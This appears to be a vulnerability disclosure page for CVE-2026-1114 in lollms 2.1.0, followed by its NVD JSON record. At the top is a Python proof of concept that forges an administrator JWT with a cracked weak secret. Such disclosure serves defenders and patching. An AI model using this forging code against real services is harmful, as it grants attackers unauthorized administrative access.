CVE-2026-1114

import jwt import datetime # PoC: Forging an admin token using a weak secret key # This script simulates the step after the attacker has cracked the weak key via brute force. def forge_admin_token(weak_secret): # Payload modified to escalate privileges to Administrator payload = { "user_id": 1, "username": "admin", "role": "administrator", "iat": datetime.datetime.utcnow(), "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=24) } # Generate a new JWT signed with the cracked weak secret # Algorithm is typically HS256 for this type of vulnerability forged_token = jwt.encode(payload, weak_secret, algorithm="HS256") return forged_token if __name__ == "__main__": # In a real attack, this key is derived from offline cracking cracked_weak_key = "123456" print("[+] Attempting to forge admin token with weak key...") admin_token = forge_admin_token(cracked_weak_key) print(f"[+] Forged Token: {admin_token}") print("[+] Attacker can now use this token to access administrative endpoints.")

{"cve": {"id": "CVE-2026-1114", "sourceIdentifier": "[email protected]", "published": "2026-04-07T07:16:23.633", "lastModified": "2026-04-28T00:00:29.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lollms:lollms:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C17EE607-0C5D-4186-AFFB-93818FA92252"}]}]}], "references": [{"url": "https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}